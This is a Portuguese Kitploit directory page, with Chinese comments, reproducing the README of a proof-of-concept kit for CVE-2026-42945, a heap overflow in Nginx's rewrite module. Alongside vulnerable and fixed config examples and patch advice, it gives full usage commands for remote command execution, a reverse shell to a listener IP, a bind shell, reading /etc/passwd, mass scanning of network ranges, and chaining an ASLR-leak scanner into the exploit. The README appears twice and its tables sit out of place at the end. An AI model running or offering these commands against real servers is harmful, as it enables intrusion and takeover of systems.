Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
Ferramentas/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebFuzzingTestes de PenetraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2026-42945 Nginx Rift - Kit de PoC

Um kit abrangente de prova de conceito para CVE-2026-42945 (Nginx Rift), uma vulnerabilidade crítica de estouro de buffer no heap no módulo ngx_http_rewrite_module do Nginx.


Resumo da Vulnerabilidade

CampoDetalhes
ID do CVECVE-2026-42945
NomeNginx Rift
TipoEstouro de Buffer no Heap
Componentengx_http_rewrite_module
GravidadeCrítica (CVSS 9.2)
Versões afetadasNginx 0.6.27 - 1.30.0
Versões corrigidasNginx 1.30.1 / 1.31.0

Causa Raiz

A vulnerabilidade existe devido a um erro de cálculo de tamanho entre duas passadas internas ao processar regras de rewrite. Se uma configuração usar:

  • Capturas regex sem nome ($1, $2, etc.)
  • Combinadas com uma string de substituição contendo ?

O Nginx calcula incorretamente o tamanho do buffer necessário durante a primeira passada e grava além do buffer de heap alocado durante a segunda passada.

Exemplo de Configuração Vulnerável

root@kitploit:~
server {
    # VULNERABLE: Unnamed capture ($1) + '?' in replacement
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

Configuração Segura (Corrigida)

root@kitploit:~
server {
    # SAFE: Named capture (?P<path>) replaces $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

Componentes do Kit

1. nginx_rift_poc.py - Ferramenta PoC Principal

Ferramenta de varredura de vulnerabilidades e exploração para alvo único.

Recursos:

  • Detectar a versão do Nginx a partir do cabeçalho Server
  • Verificar se a versão está na faixa vulnerável
  • Enviar payloads HTTP elaborados para disparar o estouro de heap
  • Gerar configurações de teste vulneráveis/seguras

Uso:

root@kitploit:~
# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com

# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - Scanner em Lote

Scanner em lote para testar vários alvos simultaneamente.

Recursos:

  • Varredura multithread (50 threads por padrão)
  • Lista de alvos a partir de arquivo ou intervalo de rede CIDR
  • Saída em JSON para integração
  • Detecção automática de SSL na porta 443

Uso:

root@kitploit:~
# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json

# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

Formato do arquivo de alvos:

root@kitploit:~
# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - Analisador de Configuração

Examina arquivos de configuração locais do Nginx em busca de padrões de rewrite vulneráveis.

Recursos:

  • Analisar nginx.conf e seguir as diretivas include
  • Detectar capturas sem nome com ? em strings de substituição
  • Suporte a correção automática (com backup)
  • Varredura recursiva de diretórios

Uso:

root@kitploit:~
# Scan single file
python config_checker.py /etc/nginx/nginx.conf

# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/

# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf

# Auto-detect common Nginx paths
python config_checker.py

4. enhanced_poc.py - PoC RCE Aprimorado

Ferramenta de exploração avançada baseada na pesquisa oficial do depthfirst, com suporte a múltiplos padrões de rewrite e modos de exploração.

Recursos:

  • Detectar automaticamente 8 padrões comuns de rewrite vulneráveis (/api/, /redirect/, /user/, etc.)
  • Suportar múltiplos caracteres de disparo de overflow (+, &, =, %)
  • Geração inteligente de payload com tamanho de overflow controlado
  • Múltiplos modos de exploração: cmd / shell / bind / read
  • Endereços base de heap/libc personalizados para ambientes com ASLR desativado
  • Construção dinâmica do corpo de spray com ngx_pool_cleanup_s falso

Uso:

root@kitploit:~
# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect

# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd

# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

Detalhes dos Modos de Exploração:

Configuração de Endereços (somente com ASLR desativado):

  • --heap-base: base do heap do alvo (ex.: 0x555555559000)
  • --libc-base: endereço base da libc (ex.: 0x7ffff77ba000)
  • --system-addr: endereço direto de system() (substitui libc-base)

5. aslr_leak_detector.py - Detector de Vazamentos de ASLR

Scanner abrangente para detectar vazamentos de informações que podem contornar a proteção ASLR.

Recursos:

  • Detecção de vazamentos em cabeçalhos HTTP (Server, X-Powered-By, etc.)
  • Análise de páginas de erro em busca de endereços de memória e stack traces
  • Sondagem de endpoints específicos do Nginx (/nginx_status, /actuator/*, etc.)
  • Detecção de vazamento de endereços de memória (ponteiros de 64 bits, endereços de heap/libc/stack)
  • Sondagem do layout do heap por meio de análise de tempo de resposta
  • Inferência do status do ASLR (ativado/desativado/fraco)
  • Integração direta com enhanced_poc.py via relatório JSON

Uso:

root@kitploit:~
# Scan single target
python aslr_leak_detector.py -t target.example.com

# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick

Integração com o PoC Aprimorado:

root@kitploit:~
# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json

# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

Indicadores de Detecção de Vulnerabilidade

A ferramenta PoC identifica a vulnerabilidade por meio dos seguintes indicadores:

IndicadorDescrição

Instalação

Nenhuma dependência externa necessária. Utiliza apenas a biblioteca padrão do Python.

root@kitploit:~
# Clone or download the toolkit
git clone <repository-url>
cd CVE-2026-42945

# Verify Python version (3.7+ recommended)
python3 --version

# Run any tool
python3 nginx_rift_poc.py --help

Versões Afetadas


Mitigação

Ações Imediatas

  1. Aplicar patch no Nginx para a versão 1.30.1 (estável) ou 1.31.0 (mainline)
  2. Auditar as configurações em busca de padrões de rewrite vulneráveis
  3. Habilitar o ASLR em todos os hosts que executam processos worker do Nginx

Solução Alternativa de Configuração

Se não for possível aplicar o patch imediatamente, substitua as capturas sem nome por capturas nomeadas:

root@kitploit:~
# BEFORE (VULNERABLE)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# AFTER (SAFE)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

Patch Virtual em WAF

Implante regras de WAF para bloquear requisições malformadas direcionadas a padrões de rewrite vulneráveis.


Aviso Legal

Este kit é destinado exclusivamente a testes de segurança autorizados e fins de pesquisa.

  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar
  • O acesso não autorizado a sistemas computacionais é ilegal
  • Os autores não são responsáveis pelo uso indevido ou por danos causados por esta ferramenta
  • Sempre teste em ambientes isolados antes do uso em produção

CVEs Relacionados

Esta falha foi descoberta juntamente com três outros problemas de corrupção de memória:

CVEDescriçãoGravidade
CVE-2026-42946Falha de alocação de memória em SCGI/UWSGIAlta
CVE-2026-40701Use-after-free na resolução de DNS para OCSPMédia
CVE-2026-42934Leitura fora dos limites no parsing de UTF-8

Referências

  • Aviso de Segurança da F5
  • Segurança do Nginx
  • Detalhes do CVE-2026-42945

Licença

Este projeto é fornecido para fins educacionais e de testes de segurança autorizados.


Autor: Security Research Team Data: 2026-06-11


Documentação em Chinês

Visão Geral da Vulnerabilidade

CVE-2026-42945 (Nginx Rift) é uma vulnerabilidade de estouro de buffer no heap no módulo ngx_http_rewrite_module do Nginx, presente desde 2008 (Nginx 0.6.27), permanecendo latente por cerca de 18 anos.

Princípio da Vulnerabilidade

Ao processar regras de rewrite, o Nginx realiza duas passadas de parsing internamente. Se a configuração atender simultaneamente às duas condições a seguir:

  1. Usar capturas regex sem nome (como $1, $2)
  2. A string de substituição contiver o caractere ?

O Nginx calcula incorretamente o tamanho do buffer durante a primeira passada e, na segunda passada, grava dados além dos limites do buffer de heap, causando o estouro de heap.

Exemplo de Configuração Vulnerável (Com Falha)

root@kitploit:~
server {
    # 有漏洞:未命名捕获 $1 + 替换字符串中的 ?
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

Exemplo de Configuração Segura (Corrigida)

root@kitploit:~
server {
    # 安全:使用命名捕获 (?P<name>) 替代 $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

Descrição dos Componentes do Kit

1. nginx_rift_poc.py — Ferramenta PoC Principal

Ferramenta de detecção e exploração de vulnerabilidades para alvo único.

Recursos:

  • Detectar a versão do Nginx a partir do cabeçalho de resposta Server
  • Determinar se a versão está na faixa vulnerável
  • Enviar requisições HTTP cuidadosamente construídas para disparar o estouro de heap
  • Gerar configurações vulneráveis/seguras para teste

Uso:

root@kitploit:~
# 检测版本并测试漏洞
python nginx_rift_poc.py -t target.example.com

# 使用自定义 Payload 测试
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS 目标
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# 生成脆弱测试配置
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# 生成安全(已修复)配置
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py — Scanner em Massa

Varredura multithread concorrente de múltiplos alvos.

Recursos:

  • Varredura concorrente com 50 threads por padrão
  • Suporte à leitura de alvos a partir de arquivo ou intervalo de rede CIDR
  • Resultados em formato JSON
  • Detecção automática de conexões SSL na porta 443

Uso:

root@kitploit:~
# 从目标文件扫描(格式:每行 host:port)
python nginx_rift_scanner.py -f targets.txt -o results.json

# 扫描单个目标
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# 扫描整个网段
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# 高速扫描(100线程)
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

Formato do arquivo de alvos:

root@kitploit:~
# 井号开头的行为注释
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py — Verificador de Arquivos de Configuração

Examina arquivos de configuração locais do Nginx em busca de padrões de rewrite vulneráveis.

Recursos:

  • Analisar nginx.conf e resolver recursivamente os arquivos referenciados por include
  • Detectar diretivas rewrite contendo capturas sem nome + ?
  • Suporte à correção automática (cria automaticamente um backup .bak)
  • Varredura recursiva de diretórios

Uso:

root@kitploit:~
# 扫描单个文件
python config_checker.py /etc/nginx/nginx.conf

# 递归扫描目录
python config_checker.py -d /etc/nginx/conf.d/

# 自动修复脆弱配置(自动备份原文件)
python config_checker.py --fix /etc/nginx/nginx.conf

# 自动探测常见 Nginx 配置路径
python config_checker.py

4. enhanced_poc.py — PoC RCE Aprimorado

Ferramenta de exploração avançada baseada na pesquisa oficial do depthfirst, com suporte a múltiplos padrões de rewrite e métodos de exploração.

Recursos:

  • Detectar automaticamente 8 padrões comuns de rewrite vulneráveis (/api/, /redirect/, /user/, etc.)
  • Suportar múltiplos caracteres de disparo de overflow (+, &, =, %)
  • Geração inteligente de payload com controle preciso do tamanho do overflow
  • Múltiplos modos de exploração: cmd / shell / bind / read
  • Endereços base de heap/libc personalizados (para ambientes com ASLR desativado)
  • Construção dinâmica do corpo de spray, contendo um ngx_pool_cleanup_s falso

Tabela de expansão dos caracteres de disparo de overflow:

Uso:

root@kitploit:~
# 自动探测配置模式和版本
python enhanced_poc.py -t target.example.com --detect

# 执行命令(ASLR 关闭环境)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# 反弹 Shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# 绑定 Shell(在目标上监听)
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# 读取远程文件
python enhanced_poc.py -t target.example.com --read /etc/passwd

# 自定义堆基址
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# 使用 & 作为溢出触发字符
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

Explicação dos modos de exploração:

Configuração de endereços (somente em ambientes com ASLR desativado):

  • --heap-base: endereço base do heap do alvo (ex.: 0x555555559000)
  • --libc-base: endereço base da libc (ex.: 0x7ffff77ba000)
  • --system-addr: especifica diretamente o endereço de system()

5. aslr_leak_detector.py — Ferramenta de Detecção de Vazamento de Informações ASLR

Scanner abrangente que detecta vazamentos de informações que podem ser usados para contornar a proteção ASLR.

Recursos:

  • Detecção de vazamento em cabeçalhos de resposta HTTP (Server, X-Powered-By, etc.)
  • Análise de páginas de erro (endereços de memória, stack traces)
  • Sondagem de endpoints específicos do Nginx (/nginx_status, /actuator/*, etc.)
  • Detecção de vazamento de endereços de memória (ponteiros de 64 bits, endereços de heap/libc/stack)
  • Sondagem do layout do heap (inferência do estado da memória por meio de diferenças no tempo de resposta)
  • Inferência do status do ASLR (ativado/desativado/fraco)
  • Integração direta com enhanced_poc.py por meio de relatórios JSON

Uso:

root@kitploit:~
# 扫描单个目标
python aslr_leak_detector.py -t target.example.com

# SSL 扫描
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# 从文件批量扫描并保存报告
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# 扫描网段
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# 快速扫描
python aslr_leak_detector.py -t target.example.com --quick

Uso integrado com o PoC aprimorado:

root@kitploit:~
# 步骤 1:检测信息泄露
python aslr_leak_detector.py -t target.example.com -o leak.json

# 步骤 2:使用泄露的地址进行利用
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

Indicadores de Detecção de Vulnerabilidade

A ferramenta PoC determina se o alvo está vulnerável por meio dos seguintes sintomas:

IndicadorDescrição

Método de Instalação

Não é necessário instalar nenhuma dependência de terceiros; basta usar a biblioteca padrão do Python para executar.

root@kitploit:~
# 克隆或下载工具包
git clone <repository-url>
cd CVE-2026-42945

# 验证 Python 版本(推荐 3.7+)
python3 --version

# 查看工具帮助
python3 nginx_rift_poc.py --help

Versões Afetadas


Medidas de Mitigação

Recomendações de Ação Imediata

  1. Atualizar o Nginx imediatamente para 1.30.1 (versão estável) ou 1.31.0 (versão mainline)
  2. Auditar os arquivos de configuração em busca de padrões de rewrite vulneráveis
  3. Ativar o ASLR (randomização do layout do espaço de endereçamento) para aumentar a dificuldade de exploração de RCE

Mitigação Temporária (quando não é possível atualizar imediatamente)

Substitua as capturas sem nome por capturas nomeadas:

root@kitploit:~
# 修改前(有漏洞)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# 修改后(安全)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

Patch Virtual em WAF

Implante regras de firewall de aplicação web (WAF) para bloquear requisições maliciosas direcionadas a padrões de rewrite vulneráveis.


Aviso Legal

Este kit é destinado exclusivamente a testes de segurança autorizados e fins de pesquisa.

  • Use esta ferramenta apenas em sistemas que você possui ou para os quais recebeu autorização explícita
  • Acessar sistemas computacionais sem autorização é ilegal
  • Os autores não se responsabilizam pelo uso indevido ou por danos causados por esta ferramenta
  • Sempre teste em ambientes isolados antes de usar em produção

Vulnerabilidades Relacionadas

Esta vulnerabilidade é uma de uma série de problemas de corrupção de memória descobertos pelo sistema de análise estática orientado por IA do depthfirst:

CVEDescriçãoNível
CVE-2026-42946Falha de alocação de memória em SCGI/UWSGIAlto
CVE-2026-40701UAF na resolução de DNS para OCSPMédio
CVE-2026-42934Leitura fora dos limites no parsing de UTF-8

Links de Referência

  • Aviso de segurança da F5
  • Aviso de segurança do Nginx
  • Detalhes do CVE-2026-42945
  • Análise técnica da SonicWall
  • Relatório de pesquisa da Cloud Security Alliance

Licença de Código Aberto

Este projeto é destinado apenas a fins educacionais e testes de segurança autorizados.


Autor: Security Research Team Data: 2026-06-11

Baixar ferramenta
ModoDescriçãoSaída
cmdExecuta um único comando shellSaída do comando no alvo
shellAbre shell reversoConecta de volta a --listen-ip:listen-port
bindAbre shell bind no alvoEscuta na porta --listen-port do alvo
readLê arquivo do alvoConteúdo gravado em /tmp/nginx_rift_read
Conexão interrompida
O alvo fecha a conexão inesperadamente (crash do worker)
Erros de gatewayRespostas HTTP 502/503/504 (processo do worker morreu)
Respostas lentasO tempo de resposta aumenta significativamente (recuperação de crash)
Respostas vaziasO corpo da resposta desaparece em comparação com a linha de base
Correspondência de versãoA versão do Nginx detectada está na faixa vulnerável
ProdutoVersões afetadasVersões corrigidas
Nginx Open Source0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress ControllerTodas as versões anteriores aos patchesAtualizar para a versão corrigida
Nginx Gateway FabricTodas as versões anteriores aos patchesAtualizar para a versão corrigida
Média
CampoDetalhes
ID do CVECVE-2026-42945
Nome da vulnerabilidadeNginx Rift
Tipo de vulnerabilidadeEstouro de buffer no heap (Heap Buffer Overflow)
Componente afetadongx_http_rewrite_module
Nível de gravidadeCrítica (CVSS 9.2)
Versões afetadasNginx 0.6.27 - 1.30.0
Versões corrigidasNginx 1.30.1 / 1.31.0
CaractereExpandido paraOverflow por caractere
+%2B+2 bytes
&%26+2 bytes
=%3D+2 bytes
%%25+2 bytes
espaço%20+2 bytes
ModoDescriçãoSaída
cmdExecuta um único comando shellSaída do comando mantida no alvo
shellGera shell reversoConecta de volta a --listen-ip:listen-port
bindGera shell bindEscuta na porta --listen-port do alvo
readLê arquivo do alvoConteúdo gravado em /tmp/nginx_rift_read
Conexão interrompidaO alvo fecha a conexão de forma anormal (crash do processo Worker)
Erros de gatewayRetorna HTTP 502/503/504 (processo Worker morto)
Respostas lentasO tempo de resposta aumenta significativamente (reinício automático após crash)
Corpo de resposta vazioEm comparação com a linha de base, o corpo da resposta fica vazio (Worker travou)
Correspondência de versãoA versão do Nginx detectada está na faixa vulnerável
ProdutoVersões afetadasVersões corrigidas
Nginx Open Source0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress ControllerTodas as versões sem patchAtualizar para a versão corrigida
Nginx Gateway FabricTodas as versões sem patchAtualizar para a versão corrigida
Médio